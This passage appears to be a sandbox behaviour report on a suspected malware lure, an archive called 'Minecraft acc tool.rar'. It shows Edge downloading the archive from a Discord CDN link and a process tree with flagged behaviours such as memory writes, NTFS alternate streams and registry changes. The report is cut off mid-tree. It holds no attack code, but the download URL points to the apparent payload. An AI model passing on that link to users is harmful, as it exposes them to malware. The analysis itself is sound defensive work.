PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 3048	2476	msedge.exe	85
PID 2476 wrote to memory of 2600	2476	msedge.exe	86
PID 2476 wrote to memory of 2600	2476	msedge.exe	86
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87
PID 2476 wrote to memory of 4812	2476	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1279178348202950717/1279179598114062416/Minecraft_acc_tool.rar?ex=66d38056&is=66d22ed6&hm=720943ed0f8868d3c122ac85477418c111a94ee92ee94b2dfd980a7cd71d34b6&
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8c31d46f8,0x7ff8c31d4708,0x7ff8c31d4718
  2⤵
  PID:2504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:532
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5708 /prefetch:8
  2⤵
  PID:1384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  PID:3664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:4016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1964 /prefetch:1
  2⤵
  PID:5588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1048 /prefetch:1
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6528 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:5680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
  2⤵
  PID:6040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:1
  2⤵
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:2516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
  2⤵
  PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7156 /prefetch:8
  2⤵
  PID:1876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6900 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
  2⤵
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6836 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7388 /prefetch:8
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6968 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4932
- C:\Users\Admin\Downloads\winrar-x64-701.exe
  "C:\Users\Admin\Downloads\winrar-x64-701.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1
  2⤵
  PID:4016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7780 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8136 /prefetch:8
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7824 /prefetch:8
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8096 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8060 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2164,2329633054382393940,5449850600682984601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7812 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1268

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4868
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Minecraft acc tool.rar"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4268
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5328
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
